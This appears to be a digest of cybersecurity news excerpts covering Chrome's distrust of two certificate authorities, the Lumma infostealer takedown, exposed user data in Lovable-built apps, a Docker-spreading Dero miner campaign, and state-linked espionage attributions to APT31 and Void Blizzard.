Note: Google Chrome communicated its removal of default trust of Chunghwa Telecom and Netlock in the public forum on May 30, 2025. The Chrome Root Program Policy states that Certification Authority (CA) certificates included in the Chrome Root Store must provide value to Chrome end users that exceeds the risk of their continued inclusion. It also describes many of the factors we consider significant when CA Owners disclose and respond to incidents. When things don’t go right, we expect CA Owners to commit to meaningful and demonstrable change resulting in evidenced continuous improvement. Chrome's confidence in the reliability of Chunghwa Telecom and Netlock as CA Owners included in the Chrome Root Store has diminished due to patterns of concerning behavior observed over the past year. These patterns represent a loss of integrity and fall short of expectations, eroding trust in these CA Owners as publicly-trusted certificate issuers trusted by default in Chrome. To safeguard Chrome’s users, and preserve the integrity of the Chrome Root Store, we are taking the following action. Upcoming change in Chrome 139 and higher: Transport Layer Security (TLS) server authentication certificates validating to the following root CA certificates whose earliest Signed Certificate Timestamp (SCT) is dated after July 31, 2025 11:59:59 PM UTC, will no longer be trusted by default. OU=ePKI Root Certification Authority,O=Chunghwa Telecom Co., Ltd.,C=TW CN=HiPKI Root CA - G1,O=Chunghwa Telecom Co., Ltd.,C=TW CN=NetLock Arany (Class Gold) Főtanúsítvány,OU=Tanúsítványkiadók (Certification Services),O=NetLock Kft.,L=Budapest,C=HU TLS server authentication certificates validating to the above set of roots whose earliest SCT is on or before July 31, 2025 11:59:59 PM UTC, will be unaffected by this change. This approach attempts to minimize disruption to existing subscribers using a previously announced Chrome feature to remove default trust based on the SCTs in certificates.
Key Findings: The takedown achieved a significant disruption to Lumma infostealers’ infrastructure, but likely didn’t permanently affect most of its Russia-hosted infrastructure. Lumma’s developers are undertaking significant efforts to reinstate the activity and to conduct business as usual. * There seems to be a significant reputational damage to the Lumma infostealer, and the key factor for the infostealer to resume regular activity will be the reputational factors (rather than the technological). On May 21, 2025, Europol, FBI, and Microsoft, in collaboration with other public and private sector partners, announced an operation to dismantle the activity of the Lumma infostealer. The malware, considered to be one of the most prolific infostealers, is distributed through a malware-as-a-service model. In addition to its use by common cyber criminals for stealing credentials, Lumma was observed to be part of the arsenal of several prominent threat actor groups, including Scattered Spider, Angry Likho, and CoralRaider. The Takedown on the Dark Web According to the reports, the takedown operation began on May 15. On that day, Lumma customers flooded dark web forums that advertise the stealer, complaining they were unable to access the malware’s command and control (C2) servers and management dashboards.
The hottest new vibe coding startup Lovable is a sitting duck for hackers
Lovable is accused of failing to fix security flaws that exposed information about users, a growing vulnerability as vibe coding’s popularity surges. Lovable, the popular vibe coding app that describes itself as the fastest-growing company in Europe, has failed to fix a critical security flaw, despite being notified about it months ago, according to a new report by an employee at a competitor. The service offered by Lovable, a Swedish startup that bills its product as “the last piece of software,” allows customers without any technical training to instantly create websites and apps using only natural language prompts. The employee at AI coding assistant company Replit who wrote the report, reviewed by Semafor, says he and a colleague scanned 1,645 Lovable-created web apps that were featured on the company’s site. Of those, 170 allowed anyone to access information about the site’s users, including names, email addresses, financial information and secret API keys for AI services that would allow would-be hackers to run up charges billed to Lovable’s customers. The vulnerability, which was made public on the National Vulnerabilities Database on Thursday, highlights a growing security problem as artificial intelligence allows anyone to become a software developer. Each new app or website created by novices is a potential sitting duck for hackers with automated tools that target everything connected to the internet. The advent of amateur vibe coding raises new questions about who is responsible for securing consumer products in an era where developers with zero security know-how can build them.
Dero miner spreads inside containerized Linux environments | Securelist
Imagine a container zombie outbreak where a single infected container scans the internet for an exposed Docker API, and bites exploits it by creating new malicious containers and compromising the running ones, thus transforming them into new “zombies” that will mine for Dero currency and continue “biting” new victims. No command-and-control server is required for the delivery, just an exponentially growing number of victims that are automatically infecting new ones. That’s exactly what the new Dero mining campaign does. During a recent compromise assessment project, we detected a number of running containers with malicious activities. Some of the containers were previously recognized, while others were not. After forensically analyzing the containers, we confirmed that a threat actor was able to gain initial access to a running containerized infrastructure by exploiting an insecurely published Docker API. This led to the running containers being compromised and new ones being created not only to hijack the victim’s resources for cryptocurrency mining but also to launch external attacks to propagate to other networks. The diagram below describes the attack vector: The entire attack vector is automated via two malware implants: the previously unknown propagation malware nginx and the Dero crypto miner. Both samples are written in Golang and packed with UPX. Kaspersky products detect these malicious implants with the following verdicts: nginx: Trojan.Linux.Agent.gen; Dero crypto miner: RiskTool.Linux.Miner.gen. nginx: the propagation malware This malware is responsible for maintaining the persistence of the crypto miner and its further propagation to external systems. This implant is designed to minimize interaction with the operator and does not require a delivery C2 server. nginx ensures that the malware spreads as long as there are users insecurely publishing their Docker APIs on the internet. The malware is named “nginx” to masquerade as the well-known legitimate nginx web server software in an attempt to evade detection by users and security tools. In this post, we’ll refer to this malware as “nginx”. After unpacking the nginx malware, we parsed the metadata of the Go binary and were able to determine the location of the Go source code file at compilation time: “/root/shuju/docker2375/nginx.go”.
Czech Republic says China behind cyberattack on ministry, embassy rejects accusations | Reuters
he Czech Republic on Wednesday accused China of being responsible for a "malicious cyber campaign" targeting a network used for unclassified communication at its Foreign Affairs ministry, but China rejected the accusations. China's embassy in Prague called on the Czech side to end its "microphone diplomacy". The attacks started during the country's 2022 EU presidency and were perpetrated by the cyber espionage group APT31, the Czech government said in a statement. The Czech Republic, an EU state and NATO member, said APT31 was publicly associated with the Chinese Ministry of State Security. Foreign Minister Jan Lipavsky said that after the attack was detected, the ministry implemented a new communications system with enhanced security in 2024. "I summoned the Chinese ambassador to make clear that such hostile actions have serious consequences for our bilateral relations," he said. Lipavsky said the attacks centered on email and other documents and focused on information concerning Asia. "The Government of the Czech Republic strongly condemns this malicious cyber campaign against its critical infrastructure," the government said in its statement. China's embassy in the Czech Republic expressed "strong concern and decisive disagreement" with the Czech accusations.
New Russia-affiliated actor Void Blizzard targets critical sectors for espionage
Microsoft Threat Intelligence has discovered a cluster of worldwide cloud abuse activity conducted by a threat actor we track as Void Blizzard, who we assess with high confidence is Russia-affiliated and has been active since at least April 2024. Void Blizzard’s cyberespionage operations tend to be highly targeted at specific organizations of interest to Russia, including in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors primarily in Europe and North America.
